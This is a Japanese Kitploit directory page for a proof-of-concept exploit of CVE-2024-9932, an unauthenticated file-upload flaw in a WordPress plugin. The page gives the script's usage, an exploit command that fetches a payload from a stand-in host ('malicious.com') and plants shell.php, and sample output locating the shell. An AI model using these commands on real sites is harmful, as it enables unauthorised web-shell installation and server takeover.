Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9932-POC | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-9932-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-9932-poc

CVE-2024-9932-POC

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-9932-POC

説明:

Wux Blog Editor WordPress プラグインは、wuxbt_insertImageNew 関数におけるファイルタイプ検証の不備により、任意のファイルアップロードに対して脆弱です。影響を受けるバージョンは 3.0.0 までです。この脆弱性により、認証されていない攻撃者がサーバーに任意のファイルをアップロードでき、リモートコード実行 (RCE) につながる可能性があります。

脆弱性の詳細

この脆弱性は、wuxbt_insertImageNew 関数における不適切なファイルタイプ検証に起因します。これにより、攻撃者は認証なしで悪意のあるファイルをサーバーにアップロードできます。

攻撃シナリオ:

root@kitploit:~
攻撃者は、脆弱なプラグインを使用している Web サイトを特定します。
ファイルアップロード機能を悪用して、悪意のある PHP シェルをアップロードします。
侵害されたサーバー上でコマンドを実行します。

使用法

root@kitploit:~
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

エクスプロイトコマンド

root@kitploit:~
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php

結果

アップロード成功例

1- ファイル発見:

2- 実行結果: ペイロードを実行するには、ファイルの URL にアクセスしてください。

root@kitploit:~
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

免責事項

このツールは教育目的のみです。許可なくシステム上でこのスクリプトを不正に使用することは違法です。

ツールをダウンロード